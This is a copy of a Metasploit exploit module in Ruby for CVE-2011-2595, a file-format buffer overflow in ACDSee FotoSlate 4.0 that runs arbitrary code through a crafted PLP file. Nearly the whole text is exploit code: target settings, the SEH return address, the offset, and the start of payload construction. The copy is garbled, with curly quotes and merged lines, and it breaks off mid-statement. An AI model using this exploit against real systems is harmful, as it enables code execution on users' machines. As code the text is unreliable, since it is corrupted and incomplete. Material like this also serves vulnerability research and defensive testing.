ACDSee FotoSlate PLP File id Parameter Overflow

##
# $Id: acdsee_fotoslate_string.rb 13853 2011-10-10 16:47:33Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => ‘ACDSee FotoSlate PLP File id Parameter Overflow’,
‘Description’ => %q{
This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via
a specially crafted id parameter in a String element. When viewing a malicious
PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a
buffer and execute arbitrary code. This exploit has been tested on systems such as
Windows XP SP3, Windows Vista, and Windows 7.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
[
‘Parvez Anwar’, # Vulnerability discovery
‘juan vazquez’ # Metasploit module
],
‘Version’ => ‘$Revision: 13853 $’,
‘References’ =>
[
[ ‘CVE’, ‘2011-2595’ ],
[ ‘OSVDB’, ‘75425’ ],
[ ‘BID’, ‘49558’ ],
],
‘DefaultOptions’ =>
{
‘EXITFUNC’ => ‘process’,
‘DisablePayloadHandler’ => ‘true’
},
‘Payload’ =>
{
#’Space’ => 4000,
‘BadChars’ => “\x00\x22”
},
‘Platform’ => ‘win’,
‘Targets’ =>
[
[
‘ACDSee FotoSlate 4.0 Build 146’,
{
‘Ret’ => 0x263a5b57, # pop, pop, ret from ipwssl6.dll
‘Offset’ => 1812,
‘TotalLength’ => 5000
}
],
],
‘Privileged’ => false,
‘DisclosureDate’ => ‘Sep 12 2011’,
‘DefaultTarget’ => 0))

register_options(
[
OptString.new(‘FILENAME’, [ true, ‘The file name.’, ‘msf.plp’]),
], self.class)
end

def exploit

overflow = rand_text(target[“Offset”])
overflow << generate_seh_record(target.ret) overflow << payload.encoded overflow << rand_text_alpha(target["TotalLength"] - overflow.length) plp =<